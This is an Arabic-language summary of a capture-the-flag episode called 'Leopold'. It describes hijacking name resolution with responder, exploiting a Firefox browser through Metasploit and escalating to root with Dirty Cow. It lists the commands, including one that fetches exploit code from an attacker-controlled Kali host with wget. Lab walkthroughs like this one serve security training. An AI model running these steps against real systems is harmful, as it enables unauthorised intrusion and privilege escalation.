CTF - Leopold (إختراق متصفح Firefox) بالعربي

هذه الحلقة فريدة من نوعها. بدلاً من الهجمات المعتادة من جانب الخادم ،سنقوم بهجوم من جانب المستخدم

سوف نتظاهر بأننا اسم كمبيوتر يحاول المستخدم التصفح إليه. بعد ذلك ، سوف نستغل متصفح المستخدم من نوع فايرفوكس لإختراق جهاز الكمبيوتر.

من هناك سنقوم بتصعيد الامتيازات للحصول على صلاحيات
root.

أدوات الاختراق المستخدمة

  • nmap
  • responder
  • Metasploit
  • searchsploit
  • Dirty Cow exploit

الأوامر المستخدمة

  • smbclient -N -L \\Target_IP
  • smbclient -N //Target_IP
  • Wireshark filter: src host Target_IP
  • responder -I eth0
  • python3 -m http.server 80
  • searchsploit cow
  • wget http://Kali_IP:8000/cow.c
  • gcc cow.c -o cowroot -pthread